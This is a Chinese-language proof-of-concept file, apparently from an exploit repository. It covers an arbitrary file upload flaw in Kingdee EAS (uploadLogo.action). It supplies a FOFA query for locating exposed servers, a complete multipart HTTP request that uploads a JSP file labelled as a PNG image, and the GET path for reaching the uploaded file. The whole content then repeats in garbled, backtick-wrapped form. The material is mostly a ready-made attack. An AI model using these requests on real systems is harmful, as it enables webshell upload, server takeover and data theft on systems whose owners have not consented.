POC/wpoc/金蝶/金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md


## 金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞

金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。

## fofa
```
app="Kingdee-EAS"
```

## poc
```
POST /plt_portal/setting/uploadLogo.action HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Forwarded-For: 
Content-Length: 632
Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62

--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top"

ch
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="dataCenter"; filename="dataCenter"

xx
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="insId"; filename="insId"


--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="type"; filename="type"

top
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: image/png

test
--04844569c7ca7d21a3ca115dca477d62--
```
![3c4d1cec26f6b03e1876b02c2f7029d9](https://github.com/wy876/POC/assets/139549762/d7a2b831-852c-4488-bcd0-f9967d0e32a4)

## 上传文件路径
```

GET /portal/res/file/upload/xxx.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Forwarded-For:
```
![47f8b3b0cc61c63d9a0d2d2b54a602dc](https://github.com/wy876/POC/assets/139549762/8a80fc29-9d8e-4622-a465-3c3c423f1e57)
first commit 2025-03-04 23:12:57 +08:00
			`## 金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞`

			`金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。`

			`## fofa`
			```
			`app="Kingdee-EAS"`
			```

			`## poc`
			```
			`POST /plt_portal/setting/uploadLogo.action HTTP/1.1`
			`Host:`
			`User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)`
			`Accept-Encoding: gzip, deflate`
			`Accept: /`
			`Connection: close`
			`X-Forwarded-For:`
			`Content-Length: 632`
			`Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62`

			`--04844569c7ca7d21a3ca115dca477d62`
			`Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top"`

			`ch`
			`--04844569c7ca7d21a3ca115dca477d62`
			`Content-Disposition: form-data; name="dataCenter"; filename="dataCenter"`

			`xx`
			`--04844569c7ca7d21a3ca115dca477d62`
			`Content-Disposition: form-data; name="insId"; filename="insId"`


			`--04844569c7ca7d21a3ca115dca477d62`
			`Content-Disposition: form-data; name="type"; filename="type"`

			`top`
			`--04844569c7ca7d21a3ca115dca477d62`
			`Content-Disposition: form-data; name="upload"; filename="test.jsp"`
			`Content-Type: image/png`

			`test`
			`--04844569c7ca7d21a3ca115dca477d62--`
			```
			`![3c4d1cec26f6b03e1876b02c2f7029d9](https://github.com/wy876/POC/assets/139549762/d7a2b831-852c-4488-bcd0-f9967d0e32a4)`

			`## 上传文件路径`
			```

			`GET /portal/res/file/upload/xxx.jsp HTTP/1.1`
			`Host:`
			`User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)`
			`Accept-Encoding: gzip, deflate`
			`Accept: /`
			`Connection: close`
			`X-Forwarded-For:`
			```
			`![47f8b3b0cc61c63d9a0d2d2b54a602dc](https://github.com/wy876/POC/assets/139549762/8a80fc29-9d8e-4622-a465-3c3c423f1e57)`